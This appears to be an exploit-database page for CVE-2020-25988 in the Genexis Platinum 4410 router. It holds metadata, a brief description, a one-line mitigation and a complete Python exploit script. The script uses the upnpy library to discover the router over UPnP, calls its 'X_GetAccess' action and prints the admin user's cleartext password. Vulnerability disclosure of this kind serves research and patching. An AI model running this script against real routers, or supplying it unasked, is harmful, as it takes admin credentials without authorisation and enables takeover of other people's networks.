header-logo
Suggest Exploit
vendor:
Platinum 4410 Router
by:
Nitesh Surana
6.5
CVSS
MEDIUM
UPnP Credential Exposure
287
CWE
Product Name: Platinum 4410 Router
Affected Version From: P4410-V2-1.34H
Affected Version To: P4410-V2-1.34H
Patch Exists: NO
Related CWE: CVE-2020-25988
CPE: h:gxgroup:platinum_4410_router
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Kali
2020

Genexis Platinum 4410 Router 2.1 – UPnP Credential Exposure

This exploit uses the upnpy library to discover UPnP devices on the network and access a specific service on the device by its ID. The 'X_GetAccess' action is then executed which returns a dictionary containing the cleartext password of 'admin' user.

Mitigation:

Disable UPnP on the router and use strong passwords for the admin account.
Source

Exploit-DB raw data:

# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Date: 17th November 2020
# Exploit Author: Nitesh Surana
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: P4410-V2-1.34H
# Tested on: Windows/Kali
# CVE : CVE-2020-25988

import upnpy

upnp = upnpy.UPnP()

# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()

# Select the device directly from the list
device = devices[0]

# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()

# We can now access a specific service on the device by its ID like a dictionary 
service = device['DeviceInfo1']

# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))